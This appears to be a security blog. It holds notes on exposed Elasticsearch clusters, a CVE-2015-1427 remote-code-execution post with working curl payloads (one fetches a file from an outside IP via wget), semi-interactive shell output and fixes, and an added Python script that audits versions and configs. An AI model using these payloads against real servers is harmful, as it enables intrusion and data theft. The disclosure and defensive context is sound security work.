Wednesday, January 11, 2017

DevOoops: Elasticsearch

Notes from the Devoops talk on Elastic Search

Elasticsearch provides a distributed, multitenant-capable full-text search engine with a RESTful web interface and schema-free JSON documents.

GET request to port 9200 will show the version, e.g.:
"version" : {
"number" : "1.2.4"


No Authentication (initially)

Can search stored data via HTTP API

Update data with PUT request

Join an open cluster and receive all data

RCE prior to 1.2.0 (CVE-2014-3120)
RCE prior to 1.5.0* (CVE-2015-1427)

exploit/multi/elasticsearch/script_mvel_rce


Kibana

Searching via curl/browser is cumbersome...Kibana FTW

Edit config.js to point to open Elasticsearch

Open index.html in local browser or host on a server




Viewing the content of the document


Import your own data and visualize



Elasticsearch solutions:

Apply authentication if possible

Segment elasticsearch from Corp (and the public in general)

Be aware of the data you put in elasticsearch --> anyone can search it

Logs Logs Logs

osquery

Wednesday, March 11, 2015

ElasticSearch CVE-2015-1427 RCE Exploit


References:
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048

Since the exploit is already out here [XiphosResearch github] and here [in a comment :-) ] and here [Metasploit pull request]

POCs

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\") getRuntime() exec(\"wget -O /tmp/testy http://192.168.1.1:8080/es_test.txt\")"}}}'

$ cat /tmp/testy
It worked :-)

---

python elastic_shell.py 127.0.0.1
--snip--
Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
elasticsearch
elasticsearch-service-mgr.exe
elasticsearch-service-x64.exe
elasticsearch-service-x86.exe
elasticsearch.bat
elasticsearch.in.bat
elasticsearch.in.sh
plugin
plugin.bat
service.bat
~$

To fix, disable Groovy scripting in config/elasticsearch.yml and upgrade to 1.4.3+:

script.groovy.sandbox.enabled: false
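An added defender-side example (not code from the talk, the post or Elastic): it reads the version banner that a GET on port 9200 returns, maps it to the two RCE CVEs listed in the Devoops notes using the fix releases stated there and in the references above (1.2.0 for CVE-2014-3120; 1.3.8 and 1.4.3 for CVE-2015-1427), and checks config/elasticsearch.yml for the `script.groovy.sandbox.enabled: false` setting from this post. The banner and config below are constructed sample input; the flat `key: value` config parser and the version-comparison rule are my assumptions, not an Elastic API.

```python
import json
import re

# Fix releases as stated in the notes and references: CVE-2014-3120 fixed in 1.2.0,
# CVE-2015-1427 (Groovy sandbox escape) fixed in 1.3.8 and 1.4.3.
FIXED_IN = {
    "CVE-2014-3120": [(1, 2, 0)],
    "CVE-2015-1427": [(1, 3, 8), (1, 4, 3)],
}

def parse_version(text):
    """Turn '1.2.4' (or '1.2.4-anything') into a comparable (1, 2, 4) tuple."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("unrecognised version string: %r" % text)
    return tuple(int(p) for p in m.groups())

def affected_cves(version):
    """List the CVEs from the notes that this Elasticsearch version is still exposed to."""
    v = parse_version(version)
    hits = []
    for cve, fixes in FIXED_IN.items():
        # Fixed if at/above the newest fix release, or at/above a backported fix on the same minor line.
        fixed = v >= max(fixes) or any(v[:2] == f[:2] and v >= f for f in fixes)
        if not fixed:
            hits.append(cve)
    return hits

def audit_config(yaml_text):
    """Flag elasticsearch.yml when Groovy sandbox scripting is not explicitly disabled."""
    settings = {}
    for line in yaml_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments; flat 'key: value' lines only (assumption)
        if ":" in line:
            key, value = line.split(":", 1)
            settings[key.strip()] = value.strip().lower()
    findings = []
    if settings.get("script.groovy.sandbox.enabled") != "false":
        findings.append("set script.groovy.sandbox.enabled: false in config/elasticsearch.yml")
    return findings

def audit_node(banner_json, yaml_text):
    """Combine the GET / banner and the node's config into one list of findings."""
    version = json.loads(banner_json)["version"]["number"]
    cves = affected_cves(version)
    findings = ["upgrade: %s exposed to %s" % (version, ", ".join(cves))] if cves else []
    return {"version": version, "cves": cves, "findings": findings + audit_config(yaml_text)}

# Constructed sample input (not a real node): the 1.2.4 banner from the notes and a config
# where the Groovy setting is still commented out.
SAMPLE_BANNER = '{"status": 200, "name": "es-node-1", "version": {"number": "1.2.4"}}'
SAMPLE_CONFIG = "cluster.name: corp-logs\n# script.groovy.sandbox.enabled: false\n"
```

Run `audit_node(SAMPLE_BANNER, SAMPLE_CONFIG)` to get both findings for the sample node; pointing it at your own nodes' banners and configs gives the inventory that the "apply authentication / segment / know your data" items above assume you have.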